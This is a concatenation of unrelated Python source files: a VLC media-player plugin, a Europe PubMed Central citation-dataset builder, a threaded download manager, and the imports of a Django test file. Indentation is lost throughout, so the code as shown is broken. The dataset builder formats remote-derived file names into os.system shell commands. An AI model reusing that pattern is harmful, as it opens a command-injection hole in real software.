self.logger.info('Releasing VLC instance resource')
self._instance.release()
self._instance = None
@staticmethod
def _post_event(evt_type, **evt):
bus = get_bus()
bus.post(evt_type(player='local', plugin='media.vlc', **evt))
def _event_callback(self):
def callback(event):
from vlc import EventType
self.logger.debug('Received vlc event: {}'.format(event))
if event.type == EventType.MediaPlayerPlaying:
self._post_event(MediaPlayEvent, resource=self._get_current_resource())
elif event.type == EventType.MediaPlayerPaused:
self._post_event(MediaPauseEvent)
elif event.type == EventType.MediaPlayerStopped or \
event.type == EventType.MediaPlayerEndReached:
self._on_stop_event.set()
self._post_event(MediaStopEvent)
for cbk in self._on_stop_callbacks:
cbk()
elif (
event.type == EventType.MediaPlayerTitleChanged or
event.type == EventType.MediaPlayerMediaChanged
):
self._title = self._player.get_title() or self._filename
if event.type == EventType.MediaPlayerMediaChanged:
self._post_event(NewPlayingMediaEvent, resource=self._title)
elif event.type == EventType.MediaPlayerLengthChanged:
self._post_event(NewPlayingMediaEvent, resource=self._get_current_resource())
elif event.type == EventType.MediaPlayerTimeChanged:
pos = float(self._player.get_time()/1000)
if self._latest_seek is None or \
abs(pos-self._latest_seek) > 5:
self._post_event(MediaSeekEvent, position=pos)
self._latest_seek = pos
elif event.type == EventType.MediaPlayerAudioVolume:
self._post_event(MediaVolumeChangedEvent, volume=self._player.audio_get_volume())
elif event.type == EventType.MediaPlayerMuted:
self._post_event(MediaMuteChangedEvent, mute=True)
elif event.type == EventType.MediaPlayerUnmuted:
self._post_event(MediaMuteChangedEvent, mute=False)
return callback
@action
def play(self, resource=None, subtitles=None, fullscreen=None, volume=None):
"""
Play a resource.
:param resource: Resource to play - can be a local file or a remote URL (default: None == toggle play).
:type resource: str
:param subtitles: Path to optional subtitle file
:type subtitles: str
:param fullscreen: Set to explicitly enable/disable fullscreen (default:
`fullscreen` configured value or False)
:type fullscreen: bool
:param volume: Set to explicitly set the playback volume (default:
`volume` configured value or 100)
:type volume: int
"""
if not resource:
return self.pause()
self._post_event(MediaPlayRequestEvent, resource=resource)
resource = self._get_resource(resource)
if resource.startswith('file://'):
resource = resource[len('file://'):]
self._filename = resource
self._init_vlc(resource)
if subtitles:
if subtitles.startswith('file://'):
subtitles = subtitles[len('file://'):]
self._player.video_set_subtitle_file(subtitles)
self._player.play()
if self.volume:
self.set_volume(volume=self.volume)
if fullscreen or self._default_fullscreen:
self.set_fullscreen(True)
if volume is not None or self._default_volume is not None:
self.set_volume(volume if volume is not None
else self._default_volume)
return self.status()
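# Illustrative call (names are an assumption, not taken from this file): from another
# platypush component one might run
#   get_plugin('media.vlc').play('file:///tmp/video.mp4', fullscreen=True, volume=80)
# which resolves the resource, spawns a fresh VLC instance and returns status().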
@action
def pause(self):
""" Toggle the paused state """
if not self._player:
return None, 'No vlc instance is running'
if not self._player.can_pause():
return None, 'The specified media type cannot be paused'
self._player.pause()
return self.status()
@action
def quit(self):
""" Quit the player (same as `stop`) """
with self._stop_lock:
if not self._player:
return None, 'No vlc instance is running'
self._player.stop()
self._on_stop_event.wait(timeout=5)
self._reset_state()
return self.status()
@action
def stop(self):
""" Stop the application (same as `quit`) """
return self.quit()
@action
def voldown(self, step=10.0):
""" Volume down by (default: 10)% """
if not self._player:
return None, 'No vlc instance is running'
return self.set_volume(int(max(0, self._player.audio_get_volume()-step)))
@action
def volup(self, step=10.0):
""" Volume up by (default: 10)% """
if not self._player:
return None, 'No vlc instance is running'
return self.set_volume(int(min(100, self._player.audio_get_volume()+step)))
@action
def set_volume(self, volume):
"""
Set the volume
:param volume: Volume value between 0 and 100
:type volume: float
"""
if not self._player:
return None, 'No vlc instance is running'
volume = max(0, min([100, volume]))
self._player.audio_set_volume(volume)
status = self.status().output
status['volume'] = volume
return status
@action
def seek(self, position):
"""
Seek backward/forward by the specified number of seconds
:param position: Number of seconds relative to the current cursor
:type position: int
"""
if not self._player:
return None, 'No vlc instance is running'
if not self._player.is_seekable():
return None, 'The resource is not seekable'
media = self._player.get_media()
if not media:
return None, 'No media loaded'
pos = min(media.get_duration()/1000, max(0, position))
self._player.set_time(int(pos*1000))
return self.status()
@action
def back(self, offset=30.0):
""" Back by (default: 30) seconds """
if not self._player:
return None, 'No vlc instance is running'
media = self._player.get_media()
if not media:
return None, 'No media loaded'
pos = max(0, (self._player.get_time()/1000)-offset)
return self.seek(pos)
@action
def forward(self, offset=30.0):
""" Forward by (default: 30) seconds """
if not self._player:
return None, 'No vlc instance is running'
media = self._player.get_media()
if not media:
return None, 'No media loaded'
pos = min(media.get_duration()/1000, (self._player.get_time()/1000)+offset)
return self.seek(pos)
@action
def toggle_subtitles(self, visibile=None):
""" Toggle the subtitles visibility """
if not self._player:
return None, 'No vlc instance is running'
if self._player.video_get_spu_count() == 0:
return None, 'The media file has no subtitles set'
if self._player.video_get_spu() is None or \
self._player.video_get_spu() == -1:
self._player.video_set_spu(0)
else:
self._player.video_set_spu(-1)
@action
def toggle_fullscreen(self):
""" Toggle the fullscreen mode """
if not self._player:
return None, 'No vlc instance is running'
self._player.toggle_fullscreen()
@action
def set_fullscreen(self, fullscreen=True):
""" Set fullscreen mode """
if not self._player:
return None, 'No vlc instance is running'
self._player.set_fullscreen(fullscreen)
@action
def set_subtitles(self, filename, **args):
""" Sets media subtitles from filename """
if not self._player:
return None, 'No vlc instance is running'
if filename.startswith('file://'):
filename = filename[len('file://'):]
self._player.video_set_subtitle_file(filename)
@action
def remove_subtitles(self):
""" Removes (hides) the subtitles """
if not self._player:
return None, 'No vlc instance is running'
self._player.video_set_spu(-1)
@action
def is_playing(self):
"""
:returns: True if it's playing, False otherwise
"""
if not self._player:
return False
return self._player.is_playing()
@action
def load(self, resource, **args):
"""
Load/queue a resource/video to the player
"""
if not self._player:
return self.play(resource, **args)
self._player.set_media(resource)
return self.status()
@action
def mute(self):
""" Toggle mute state """
if not self._player:
return None, 'No vlc instance is running'
self._player.audio_toggle_mute()
@action
def set_position(self, position):
"""
Seek backward/forward to the specified absolute position (same as ``seek``)
"""
return self.seek(position)
@action
def status(self):
"""
Get the current player state.
:returns: A dictionary containing the current state.
Example::
output = {
"filename": "filename or stream URL",
"state": "play" # or "stop" or "pause"
}
"""
import vlc
with self._stop_lock:
if not self._player:
return {'state': PlayerState.STOP.value}
status = {}
vlc_state = self._player.get_state()
if vlc_state == vlc.State.Playing:
status['state'] = PlayerState.PLAY.value
elif vlc_state == vlc.State.Paused:
status['state'] = PlayerState.PAUSE.value
else:
status['state'] = PlayerState.STOP.value
status['url'] = urllib.parse.unquote(self._player.get_media().get_mrl()) if self._player.get_media() else None
status['position'] = float(self._player.get_time()/1000) if self._player.get_time() is not None else None
media = self._player.get_media()
status['duration'] = media.get_duration()/1000 if media and media.get_duration() is not None else None
status['seekable'] = status['duration'] is not None
status['fullscreen'] = self._player.get_fullscreen()
status['mute'] = self._player.audio_get_mute()
status['path'] = status['url']
status['pause'] = status['state'] == PlayerState.PAUSE.value
status['percent_pos'] = self._player.get_position()*100
status['filename'] = self._filename
status['title'] = self._title
status['volume'] = self._player.audio_get_volume()
status['volume_max'] = 100
return status
def on_stop(self, callback):
self._on_stop_callbacks.append(callback)
def _get_current_resource(self):
if not self._player or not self._player.get_media():
return
return self._player.get_media().get_mrl()
# vim:sw=4:ts=4:et:
|
EuropePubMedCentralDataset.py
|
from os import listdir, system, remove
from os.path import isfile, join
import re
import multiprocessing
from urllib.parse import unquote
import json
from lxml import etree
import pandas as pd
import tqdm
import time
import httplib2
from bs4 import BeautifulSoup, SoupStrainer
import wget
from multiprocessing.pool import ThreadPool
import os
import uuid
from queue import Queue
from typing import Optional
import csv
from threading import Thread
import pickle
from config import *
__author__ = "Gabriele Pisciotta"
class EuropePubMedCentralDataset:
def __init__(self,
start_path,
writing_multiple_csv,
skip_download,
download_workers,
unzip_threads,
process_article_threads,
max_file_to_download):
self.pubmed_file_path = start_path
self.skip_download = skip_download
self.download_workers = download_workers
self.unzip_threads = unzip_threads
self.process_article_threads = process_article_threads
self.max_file_to_download = max_file_to_download
self.pubmed_dump_file_path = join(self.pubmed_file_path, 'dump')
self.articles_path = join(self.pubmed_file_path, 'articles')
self.csv_file_path = join(self.pubmed_file_path, 'csv')
self.folder_articles = folder_articles
# We can both exploit a queue in order to write into a single dataset.csv
# or to save multiple csv and then concatenate them into the final dataset
self.writing_multiple_csv = writing_multiple_csv
if not self.writing_multiple_csv:
self.queue = Queue()
os.makedirs(self.articles_path, exist_ok=True)
os.makedirs(self.csv_file_path, exist_ok=True)
os.makedirs(self.pubmed_dump_file_path, exist_ok=True)
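# Illustrative construction (values are assumptions, not taken from config.py):
#   EuropePubMedCentralDataset(start_path='/data/epmc', writing_multiple_csv=True,
#                              skip_download=False, download_workers=4, unzip_threads=4,
#                              process_article_threads=8, max_file_to_download=None)
# writing_multiple_csv=True writes one CSV per article and concatenates them at the end;
# False routes every row through a single queue-backed dataset.csv writer.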
def start(self):
if not self.skip_download:
# for each file from the pubmed dump
f = self._get_files_in_dir(self.pubmed_dump_file_path)
# load local index of already downloaded dump and add to the list of already downloaded file
if os.path.isfile(join(self.pubmed_file_path, 'downloaded-dump.txt')):
with open(join(self.pubmed_file_path, 'downloaded-dump.txt'), 'r') as index_file:
for line in index_file:
f.append(line.replace("\n", ""))
# get the difference between files to download and files that we have
links = self.get_links_from_pubmed()
if len(links) > 0:
todownload = list(set(links).difference(set(f)))
if self.max_file_to_download is not None:
todownload = todownload[:int(self.max_file_to_download)]
if len(todownload):
print("\nDownloading {} OA dumps from EuropePubMedCentral".format(len(todownload)))
with multiprocessing.Pool(self.download_workers) as pool:
pool.map(worker_download_links, ((d, self.pubmed_dump_file_path) for d in todownload))
else:
print("No link to download!")
# Update the file list
f = self._get_files_in_dir(self.pubmed_dump_file_path)
# Unzip all the files
if len(f) > 0:
print("\nUnzipping all the articles")
s = time.time()
with ThreadPool(self.unzip_threads) as pool:
list(tqdm.tqdm(pool.imap(self.worker_unzip_files, f), total=len(f)))
e = time.time()
print("\nTime: {}".format((e - s)))
# process each article
f = self._get_articles_in_dir(self.articles_path)
if len(f) > 0:
self.load_PMC_ids()
s = time.time()
print("\nProcessing the articles")
self.process_articles(f)
e = time.time()
print("\nTime: {}".format((e - s)))
self._concatenate_datasets(self.csv_file_path)
def load_PMC_ids(self):
# Download articles' IDs --
if not os.path.isfile(join(self.pubmed_file_path, 'PMC-ids.csv.gz')):
print("\nDownloading PMC's IDs dataset")
wget.download('http://ftp.ncbi.nlm.nih.gov/pub/pmc/PMC-ids.csv.gz', self.pubmed_file_path)
# Pickle a dictionary of the dataframe containing only the keys that we care about
if not os.path.isfile(join(self.pubmed_file_path, 'PMC-ids.pkl')):
# Read the dataset and create a single big dict having all the needed keys for entity resolution
articleids = pd.read_csv(join(self.pubmed_file_path, 'PMC-ids.csv.gz'), usecols=['PMCID', 'PMID', 'DOI'],
low_memory=True)
articleids = articleids.drop_duplicates()
view = articleids[articleids['PMID'].notna()]
view['PMID'] = view['PMID'].astype(int)
view_clean = view.drop_duplicates(subset='PMID', keep="last")
dataset = view_clean.set_index('PMID').to_dict('index')
del view
view = articleids[articleids['PMCID'].notna()]
view['PMID'] = view['PMID'].astype('Int64')
del articleids
view_clean = view.drop_duplicates(subset='PMCID', keep="last")
self.articleids = {**dataset, **view_clean.set_index('PMCID').to_dict('index')}
del view
pickle.dump(obj=self.articleids, file=open(join(self.pubmed_file_path, 'PMC-ids.pkl'), 'wb'))
else:
print("Loading PMC IDs from pickled dict")
self.articleids = pickle.load(open(join(self.pubmed_file_path, 'PMC-ids.pkl'), 'rb'))
def write_to_csv(self):
keys = ['cur_doi', 'cur_pmid', 'cur_pmcid', 'cur_name', 'references']
while True:
# Blocking get() avoids busy-waiting while the queue is empty
row = self.queue.get()
if row == "STOP":
return
else:
row = [v for k, v in row.items()]
if not os.path.isfile(join(self.csv_file_path, "dataset.csv")):
with open(join(self.csv_file_path, "dataset.csv"), 'w', newline='') as output_file:
dict_writer = csv.writer(output_file, delimiter='\t')
dict_writer.writerow(keys)
dict_writer.writerow(row)
else:
with open(join(self.csv_file_path, "dataset.csv"), 'a', newline='') as output_file:
dict_writer = csv.writer(output_file, delimiter='\t')
dict_writer.writerow(row)
def worker_article(self, f: str) -> None:
# Use the extracted file
with open(f, 'r') as fi:
filename = f.split(os.sep)[-1]
try:
cur_xml = etree.parse(fi)
except Exception as e:
print(e)
os.makedirs(join(self.articles_path, 'exceptions'), exist_ok=True)
with open(join(self.articles_path, 'exceptions', filename), 'w') as fout:
for line in fi:
fout.write(line)
os.remove(f)
return
cur_pmid = self.get_id_from_xml_source(cur_xml, 'pmid')
cur_pmcid = self.get_id_from_xml_source(cur_xml, 'pmcid')
if cur_pmcid is not None and not cur_pmcid.startswith("PMC"):
cur_pmcid = "PMC{}".format(cur_pmcid)
cur_doi = self.normalise_doi(self.get_id_from_xml_source(cur_xml, 'doi'))
# If we have no identifier, stop the processing of the article
if cur_pmid is None and cur_pmcid is None and cur_doi is None:
os.makedirs(join(self.articles_path, 'without-id'), exist_ok=True)
with open(join(self.articles_path, 'without-id', filename), 'w') as fout:
with open(f, 'r') as fi:
for line in fi:
fout.write(line)
os.remove(f)
return
try:
# Extract missing metadata from the ID dataset
if cur_pmid is None or cur_pmcid is None or cur_doi is None:
row = None
if cur_pmid is not None and self.articleids.__contains__(int(cur_pmid)):
row = self.articleids[int(cur_pmid)]
elif cur_pmcid is not None and self.articleids.__contains__(cur_pmcid):
row = self.articleids[cur_pmcid]
if row is not None and len(row):
if cur_pmid is None and row['PMID'] is not None and not pd.isna(row['PMID']):
cur_pmid = row['PMID']
if cur_pmcid is None and row['PMCID'] is not None:
cur_pmcid = row['PMCID']
if cur_doi is None and row['DOI'] is not None:
cur_doi = self.normalise_doi(str(row['DOI']))
references = cur_xml.xpath(".//ref-list/ref")
references_list = []
if len(references):
for reference in references:
entry_text = self.create_entry_xml(reference)
ref_pmid = None
ref_doi = None
ref_pmcid = None
ref_url = None
# The XML id attribute may be missing or empty; normalise both cases to None
ref_xmlid = reference.get('id') or None
ref_pmid_el = reference.xpath(".//pub-id[@pub-id-type='pmid']")
if len(ref_pmid_el):
ref_pmid = etree.tostring(
ref_pmid_el[0], method="text", encoding='unicode').strip()
ref_doi_el = reference.xpath(".//pub-id[@pub-id-type='doi']")
if len(ref_doi_el):
ref_doi = self.normalise_doi(etree.tostring(
ref_doi_el[0], method="text", encoding='unicode').lower().strip())
if ref_doi == "":
ref_doi = None
ref_pmcid_el = reference.xpath(".//pub-id[@pub-id-type='pmcid']")
if len(ref_pmcid_el):
ref_pmcid = etree.tostring(
ref_pmcid_el[0], method="text", encoding='unicode').strip()
if ref_pmcid == "":
ref_pmcid = None
elif not ref_pmcid.startswith("PMC"):
ref_pmcid = "PMC{}".format(ref_pmcid)
ref_url_el = reference.xpath(".//ext-link")
if len(ref_url_el):
ref_url = etree.tostring(
ref_url_el[0], method="text", encoding='unicode').strip()
if not ref_url.startswith("http"):
ref_url = None
# Extract missing metadata from the ID dataset
if ref_pmid is None or ref_pmcid is None or ref_doi is None:
row = None
if ref_pmid is not None and self.articleids.__contains__(int(ref_pmid)):
row = self.articleids[int(ref_pmid)]
elif ref_pmcid is not None and self.articleids.__contains__(ref_pmcid):
row = self.articleids[ref_pmcid]
if row is not None and len(row):
if ref_pmid is None and row['PMID'] is not None:
ref_pmid = row['PMID']
if ref_pmcid is None and row['PMCID'] is not None:
ref_pmcid = row['PMCID']
if not ref_pmcid.startswith("PMC"):
ref_pmcid = "PMC{}".format(ref_pmcid)
if ref_doi is None and row['DOI'] is not None:
ref_doi = self.normalise_doi(str(row['DOI']))
# Create an object to store the reference
obj = {}
if entry_text is not None:
obj['entry_text'] = entry_text
if ref_pmid is not None:
obj['ref_pmid'] = str(ref_pmid)
if ref_pmcid is not None:
obj['ref_pmcid'] = ref_pmcid
if ref_doi is not None:
obj['ref_doi'] = ref_doi
if ref_url is not None:
obj['ref_url'] = ref_url
if ref_xmlid is not None:
obj['ref_xmlid'] = ref_xmlid
references_list.append(obj)
if self.writing_multiple_csv:
df = pd.DataFrame({
'cur_doi': [cur_doi],
'cur_pmid': [cur_pmid],
'cur_pmcid': [cur_pmcid],
'cur_name': [f.split("articles"+os.sep)[-1]],
'references': [json.dumps(references_list)]
})
df.to_csv(join(self.csv_file_path, "{}.csv".format(filename)), sep="\t", index=False)
else:
self.queue.put({
'cur_doi': cur_doi,
'cur_pmid': cur_pmid,
'cur_pmcid': cur_pmcid,
'cur_name': f,
'references': json.dumps(references_list)
})
except Exception as e:
os.makedirs(join(self.articles_path, 'exceptions'), exist_ok=True)
with open(join(self.articles_path, 'exceptions', filename), 'w') as fout:
with open(f, 'r') as fi:
for line in fi:
fout.write(line)
os.remove(f)
print("Exception {} with file: {}".format(e, f))
return
def process_articles(self, f):
articles_to_process = []
for dump_articles_folder in f:
for path, subdirs, files in os.walk(os.path.join(self.articles_path, dump_articles_folder)):
for name in files:
articles_to_process.append(os.path.join(path, name))
if not self.writing_multiple_csv:
consumer = Thread(target=self.write_to_csv)
consumer.daemon = True
consumer.start()
with ThreadPool(self.process_article_threads) as pool:
list(tqdm.tqdm(pool.imap(self.worker_article, (fi for fi in articles_to_process)), total=len(articles_to_process)))
if not self.writing_multiple_csv:
self.queue.put("STOP")
consumer.join()
@staticmethod
def normalise_doi(doi_string) -> Optional[
str]: # taken from https://github.com/opencitations/index/blob/master/identifier/doimanager.py
if doi_string is not None:
try:
doi_string = re.sub(r"\0+", "", re.sub(r"\s+", "", unquote(doi_string[doi_string.index("10."):])))
return doi_string.lower().strip()
except ValueError:
return None
else:
return None
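# Example (hypothetical input): normalise_doi("https://doi.org/10.1000/XYZ%20 1")
# keeps everything from "10." onwards, unquotes the percent-encoding, strips all
# whitespace and lowercases, returning "10.1000/xyz1".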
def worker_unzip_files(self, f: str) -> None:
try:
# Unzip
system("gunzip -k {}".format(join(self.pubmed_dump_file_path, f)))
# This is the new filename
gzip_name = f
f = f.replace(".gz", "")
# Create one file for each article, named with a random UUID
tree = etree.parse(join(self.pubmed_dump_file_path, f), etree.XMLParser(remove_blank_text=True))
# Extract all the article nodes
articles = tree.findall('article')
dump_articles_dir = os.path.join(self.articles_path, f.replace(".xml", ""))
os.makedirs(dump_articles_dir, exist_ok=True)
for i in range(self.folder_articles+1):
os.makedirs(os.path.join(dump_articles_dir, str(i)), exist_ok=True)
for i, cur_xml in enumerate(articles):
dir_of_article = os.path.join(dump_articles_dir, str(i % self.folder_articles))
with open(join(dir_of_article, "{}.xml".format(str(uuid.uuid4()))), 'w') as writefile:
writefile.write(etree.tostring(cur_xml, pretty_print=True, encoding='unicode'))
# Remove the downloaded dump
remove(join(self.pubmed_dump_file_path, f))
remove(join(self.pubmed_dump_file_path, gzip_name))
except Exception as e:
print("Exception during the extraction: {}".format(e))
system("rm {}{}*.xml".format(self.pubmed_dump_file_path,os.sep))
@staticmethod
def create_entry_xml(xml_ref): # Taken from CCC
entry_string = ""
el_citation = xml_ref.xpath("./element-citation | ./mixed-citation | ./citation")
if len(el_citation):
cur_el = el_citation[0]
is_element_citation = cur_el.tag == "element-citation" or cur_el.tag == "citation"
has_list_of_people = False
first_text_passed = False
for el in cur_el.xpath(".//node()"):
type_name = type(el).__name__
if type_name == "_Element":
cur_text = el.text
if cur_text is not None and " ".join(cur_text.split()) != "":
if first_text_passed:
is_in_person_group = len(el.xpath("ancestor::person-group")) > 0
if is_in_person_group:
entry_string += ", "
has_list_of_people = True
elif not is_in_person_group and has_list_of_people:
entry_string += ". "
has_list_of_people = False
else:
if is_element_citation:
entry_string += ", "
else:
entry_string += " "
else:
first_text_passed = True
if el.tag == "pub-id":
if el.xpath("./@pub-id-type = 'doi'"):
entry_string += "DOI: "
elif el.xpath("./@pub-id-type = 'pmid'"):
entry_string += "PMID: "
elif el.xpath("./@pub-id-type = 'pmcid'"):
entry_string += "PMC: "
elif type_name == "_ElementStringResult" or type_name == "_ElementUnicodeResult":
entry_string += el
del cur_el
del el
entry_string = " ".join(entry_string.split())
entry_string = re.sub(" ([,\.!\?;:])", "\\1", entry_string)
entry_string = re.sub("([\-–––]) ", "\\1", entry_string)
entry_string = re.sub("[\-–––,\.!\?;:] ?([\-–––,\.!\?;:])", "\\1", entry_string)
entry_string = re.sub("(\(\. ?)+", "(", entry_string)
entry_string = re.sub("(\( +)", "(", entry_string)
del el_citation
if entry_string is not None and entry_string != "":
return entry_string
else:
return None
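# Illustrative result (made-up reference): an <element-citation> listing authors
# "Doe J" and "Roe R", a title and a DOI is flattened to roughly
#   "Doe J, Roe R. Some title, DOI: 10.1234/abcd"
# with spacing and punctuation normalised by the regexes above.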
@staticmethod
def get_id_from_xml_source(cur_xml, id_type):
"""This method extract an id_type from the XML"""
if id_type not in ["doi", "pmid", "pmcid"]:
print("Wrong id used: {}".format(id_type))
return None
id_string = cur_xml.xpath(".//front/article-meta/article-id[@pub-id-type='{}']".format(id_type))
if len(id_string):
id_string = u"" + etree.tostring(id_string[0], method="text", encoding='unicode').strip()
if id_string != "":
del cur_xml
toret = str(id_string)
del id_string
return toret
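# Example (hypothetical JATS fragment): given
#   <front><article-meta><article-id pub-id-type="doi">10.1/xyz</article-id></article-meta></front>
# get_id_from_xml_source(tree, 'doi') returns "10.1/xyz", while unknown id types return None.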
# Get list of file inside the dir
def _get_files_in_dir(self, path: str) -> list:
list_of_files = [f for f in listdir(path) if isfile(join(path, f))]
return list_of_files
def _get_articles_in_dir(self, path: str) -> list:
list_of_files = [f for f in listdir(path)]
return list_of_files
def _concatenate_datasets(self, path: str) -> str:
if self.writing_multiple_csv:
present_files = list(self._get_files_in_dir(path))
header_saved = False
if len(present_files) > 0:
print("\nConcatenating dataset")
start = time.time()
with open(join(path, 'dataset.csv'), 'w') as fout:
for f in tqdm.tqdm(present_files):
if f != "dataset.csv":
with open(join(path, f)) as fin:
header = next(fin)
if not header_saved:
fout.write(header)
header_saved = True
for line in fin:
fout.write(line)
os.remove(join(path, f))
df = pd.read_csv(join(path, 'dataset.csv'), sep='\t')
df.drop_duplicates(inplace=True)
df.to_csv(join(path, 'dataset.csv'), sep='\t', index=False)
end = time.time()
print("Time: {}".format((end - start)))
return join(path, 'dataset.csv')
def get_links_from_pubmed(self) -> list:
links = []
http = httplib2.Http(timeout=20)
try:
status, response = http.request('http://europepmc.org/ftp/oa/')
if status['status'] != '200':
raise Exception("response code {}".format(status['status']))
for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')):
if link.has_attr('href'):
if "xml.gz" in link['href']:
links.append(link['href'])
return links
except Exception as e:
print("Cannot get OA links: {}".format(e))
return []
def worker_download_links(args):
""" If something goes wrong, then wait 3 sec and retry until the max number of possible tries is reached """
todownload, pubmed_dump_file_path = args
downloaded = False
retry = 0
while not downloaded and retry < max_retry:
try:
wget.download('http://europepmc.org/ftp/oa/{}'.format(todownload), pubmed_dump_file_path)
downloaded = True
with open(os.path.join(pubmed_dump_file_path, '..', 'downloaded-dump.txt'), 'a') as index_file:
index_file.write(todownload + "\n")
except Exception as e:
print("\n(retry #{}) Problem with {}: {}".format(retry, todownload, e))
retry += 1
time.sleep(sec_between_retry)
if __name__ == '__main__':
e = EuropePubMedCentralDataset(start_path=start_path,
writing_multiple_csv=writing_multiple_csv,
skip_download=skip_download,
download_workers=download_workers,
unzip_threads=unzip_threads,
process_article_threads=process_article_threads,
max_file_to_download=max_file_to_download)
e.start()
|
DLManager.py
|
from .packer import Packer
import time, threading
from .DLError import DLUrlError
from .DLThreadPool import ThreadPool
import queue
from . import DLCommon as cv
from .DLProgress import TimeStatus
class Manager(Packer, object):
def __init__(self, daemon=False, max_task=2):
self.threads = ThreadPool(daemon)
self.tasks = {}
self._mapid = []
self._nameid = {}
self.max_task = max_task
self._queue = TaskQueue()
self._insp_thr = None
self._queue_lock = threading.RLock()
self._done_buff = []
self._trap_thrs = {}
self._url_excepts = queue.Queue()
self.status = TimeStatus()
def _inspector_thread(self):
while True:
if self.status.pausing() or self.status.isEnd():
self.checkRunQueue()
break
self.checkRunQueue()
self.run()
time.sleep(0.01)
def checkRunQueue(self):
with self._queue_lock:
for i in list(self._queue.run):
if self.tasks[i].isEnd():
self.tasks[i].close()
self._queue.run.remove(i)
self._queue.done.append(i)
self._done_buff.append(i)
elif self.tasks[i].isCritical():
self._queue.run.remove(i)
self._queue.critical.append(i)
if not self._queue.run and not self._queue.undone:
self.status.endGo()
self.status.endDone()
def isCritical(self):
return False
# if self.status.isEnd():
# return False
# critical = False
# for i in list(self.getAll().values()):
# if not i.isEnd() and i.isCritical():
# critical = True
# # else:
# return critical
# return True
def getExcept(self):
return list(self._url_excepts.queue)
def get(self, name=None, id=None):
if name is None and id is None:
return None
if id is not None:
return self.tasks[id]
if name is not None:
return self.tasks[self.getIdByName(name)]
def getAll(self):
return self.tasks
def getRunQueue(self):
return self._queue.run
def getPauseQueue(self):
return self._queue.pause
def getDoneQueue(self):
return self._queue.done
def getUndoneQueue(self):
return self._queue.undone
def getCriticalQueue(self):
return self._queue.critical
def getIdByName(self, name):
return self._nameid[name]
def getNameById(self, id):
for i, j in self._nameid.items():
if id == j:
return i
def addHandler(self, Handler, name=None):
with self._queue_lock:
id = self.newId()
name = id if not name else name
self.tasks[id] = Handler
self._nameid[name] = id
self._mapid[id] = True
self._queue.undone.append(id)
return id
def newId(self):
for i, j in enumerate(self._mapid):
if not j:
return i
else:
self._mapid.append(False)
return len(self._mapid) - 1
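# Example: with _mapid == [True, False, True] the first free slot gives id 1;
# with _mapid == [True, True] a new slot is appended and id 2 is returned.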
def remove(self, id):
with self._queue_lock:
del self.tasks[id]
self._mapid[id] = False
del self._nameid[self.getNameById(id)]
def run(self, id=None):
with self._queue_lock:
if not self._insp_thr or self._insp_thr.isStoped():
self._insp_thr = self.threads.Thread(target=self._inspector_thread,
name=cv.MANAGER)
self._insp_thr.start()
if id is not None:
if len(self._queue.run) < self.max_task:
self.tasks[id].run()
self._queue.run.append(id)
else:
if not self.status.isStarted():
self.status.startGo()
for i in list(self._queue.undone):
self.status.startGo()
if len(self._queue.run) < self.max_task:
self.tasks[i].run()
self._queue.run.append(i)
# self._queue.pause.remove(i)
self._queue.undone.remove(i)
else:
break
def pause(self, id=None):
self._done_buff = []
if id is not None:
self.tasks[id].pause()
with self._queue_lock:
if id in self._queue.run:
self._queue.run.remove(id)
if id not in self._queue.pause:
self._queue.pause.append(id)
else:
self.status.startPause()
self._insp_thr.join()
for i in self._queue.run:
self.threads.Thread(target=self._pause, name='Nb-Manager-Pause', args=(i,)).start()
self.status.endPause()
shutdown = pause
def isPaused(self):
return self.status.isPaused()
isShutdown = isPaused
def _pause(self, id):
self.tasks[id].pause()
with self._queue_lock:
if id in self._queue.run:
self._queue.run.remove(id)
if id not in self._queue.pause:
self._queue.pause.append(id)
self.checkRunQueue()
def close(self):
pass
def join(self):
if not self._insp_thr:
raise RuntimeError('cannot join thread before it is started')
self._insp_thr.join()
for i, j in list(self.tasks.items()):
self.tasks[i].join()
def _trap_run(self):
for i in list(self._queue.run):
dl = self.tasks[i]
if id(dl) not in self._trap_thrs:
if not dl.isEnd():
thr = self.threads.Thread(target=self._trap, args=(dl,))
self._trap_thrs[id(dl)] = thr
thr.start()
def trap(self):
if not self._insp_thr:
raise RuntimeError('cannot join thread before it is started')
self._trap_run()
while self._trap_thrs or not self._url_excepts.empty():
self._trap_run()
if not self._url_excepts.empty():
_except = self._url_excepts.get(timeout=1)
raise _except
time.sleep(0.01)
self._insp_thr.join()
def _trap(self, task):
try:
task.trap()
except DLUrlError as e:
self._url_excepts.put(e)
del self._trap_thrs[id(task)]
def getAvgSpeed(self, id=None):
if id is not None:
return self.tasks[id].getAvgSpeed()
speed = 0
for i in self._queue.run:
if not self.tasks[i].isEnd():
speed += self.tasks[i].getAvgSpeed()
return speed
def getInsSpeed(self, id=None):
if id is not None:
return self.tasks[id].getInsSpeed()
speed = 0
for i in self._queue.run:
speed += self.tasks[i].getInsSpeed()
for i in list(self._done_buff):
tmp = self.tasks[i].getInsSpeed()
speed += tmp
if tmp < 100:
self._done_buff.remove(i)
# self._done_buff = []
return speed
def getIncByte(self, id=None):
if id is not None:
return self.tasks[id].getIncByte()
inc = 0
for i in self._queue.done:
inc += self.tasks[i].getFileSize()
for i in self._queue.run:
dl = self.tasks[i]
inc += dl.getFileSize() - dl.getLeft()
return inc
def getFileSize(self, id=None):
if id is not None:
return self.tasks[id].getFileSize()
return self.getTotalSize()
def getTotalSize(self):
size = 0
for i, j in self.tasks.items():
size += j.getFileSize()
return size
def getLeft(self, id=None):
if id is not None:
return self.tasks[id].getLeft()
left = 0
for i in self._queue.run:
if not self.tasks[i].isEnd():
left += self.tasks[i].getLeft()
for i in self._queue.undone:
left += self.tasks[i].getLeft()
return left
def isEnd(self, id=None):
if id is not None:
return self.tasks[id].isEnd()
else:
return self.status.isEnd()
def config(self, **kwargs):
for i, j in self.__config_params__():
if i in kwargs:
setattr(self, j, kwargs[i])
def __config_params__(self):
return [('max_task', 'max_task')]
def __packet_params__(self):
return ['tasks', 'max_task']
def unpack(self, packet):
Packer.unpack(self, packet)
class TaskQueue(object):
def __init__(self):
self.run = []
self.pause = []
self.undone = []
self.done = []
self.ready = []
self.critical = []
|
test_utils.py
|
import json
import os
import shutil
import tempfile
import time
import zipfile
import multiprocessing
import contextlib
from unittest import mock
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import ValidationError
from django.test.utils import override_settings
import lxml
import pytest
from defusedxml.common import NotSupportedError
from olympia import amo
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.tests.test_helpers import get_addon_file
from olympia.applications.models import AppVersion
from olympia.files import utils
